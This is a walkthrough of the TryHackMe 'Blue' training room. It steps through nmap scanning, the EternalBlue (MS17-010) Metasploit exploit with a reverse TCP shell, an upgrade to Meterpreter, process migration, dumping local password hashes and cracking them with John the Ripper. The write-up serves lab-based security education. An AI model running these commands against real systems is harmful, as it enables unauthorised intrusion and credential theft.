Written by Simon

TryHackMe – Blue Room Walk Through

The Blue Room in TryHackMe is one of the first rooms to try. It is designed to show you how to hack into a Windows machine using the EternalBlue Exploit

The room is available at https://tryhackme.com/room/blue

First Step is recon

sudo nmap -sS -O -sV -T4 -Pn -n X.X.X.X

We are using the following nmap switches

  • -sS – Syn Scan (Semi Stealthy Scan)
  • -O – Check what Operating System is running
  • -sV – Check what version of software is running on open ports
  • -t4 – Speed up the Scan
  • -Pn – Don’t do a ping (It is noted in the box that it does not respond to pings)
  • -n – Disable DNS resolution (We don’t need the DNS name)

From the scan results, we can see the ports 135, 139 and 445 are open so it is safe to assume that this is Windows machine.

sudo nmap -p 135,139,445 --script vuln -oN blueroom.nmap X.X.X.X

We are using the following nmap switches

  • -p 135,139,445 – Scan only these ports since we know this is a Windows machines
  • –script vuln – Use the Nmap vulnerability database to scan for possible issues
  • -oN – Save the output to a file named blueroom.nmap

Nmap is telling us that the machines is vulnrable to Remote Code Execution (ms17-010). The CVE Entry is CVE-2017-0143.

Second step is Exploit Time

Now that we know the machine is vulnrable, we can exploit it.

Start by running Metasploit

sudo msfconsole

Now lets see what exploits are available for ms17-010 in Metasploit

search ms17-010

We are going to use the EternalBlue Exploit

use exploit/windows/smb/ms17_010_eternalblue

We could use several different payloads, but I am choosing to use the bind TCP handler.

Now we have to tell Metasploit what machine to attack, so set the Remote Host with the Blue Box IP address

set RHOST X.X.X.X - The target machine IP
set LHOST X.X.X.X - Your machine IP
set PAYLOAD generic/shell_reverse_tcp - Creates a reverse TCP Shell

Now lets exploit the box

exploit

If everything works correctly, you should be dropped into a DOS shell. Note that you may have to reboot the target PC once or twice to get the exploit to work correctly.

Upgrade Priviledges

Now it is time to upgrade our access on the system

Run the command

Hit Control Z and confirm Yes to Background Session X

set post /multi/manage/shell_to_meterpreter

Next, we need to show what sessions we have on the target

sessions

and then run the command to see what options we need to configure

show options

Now add the session number you got from the sessions command earlier

set session X

Now lets run the post exploit

run

Once Metasploit says Stopping exploit/multi/handler, wait 10 seconds and then press enter. You should be dropped back into the msfconsole.

Then run sessions command again and you should see you now have two sessions

Next run the command where X is the new session, this will drop you into a interactive session

session -i X

To confirm that you have full access to the system, run the command below. It should say you are NT AUTHORITY\SYSTEM

getuid

Next run the command ps to get a list of running processes. Look and record any process ID’s for any that are running as NT AUTHORITY\SYSTEM – A good choice is the printer spool service – spoolsv.exe

ps

Now migrate to the service by running

migrate XXXX

Keeping Access

Now it’s time to keep our access, we are going to crack some passwords.

We are going to dump the User Names and Password Hashs for the local users

So first run the command below

hashdump

Next copy the entire line for Jon and save it into a text file called blue.hash. Now open a new terminal and runnin the following command. It will use John the Ripper to try crack the password and will use the infamous rockyou password list.

sudo john blue.hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

If you don’t have the rockyou.txt file available, run the following

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

To show the crack password, just run the command

sudo john blue.hash --format=NT --show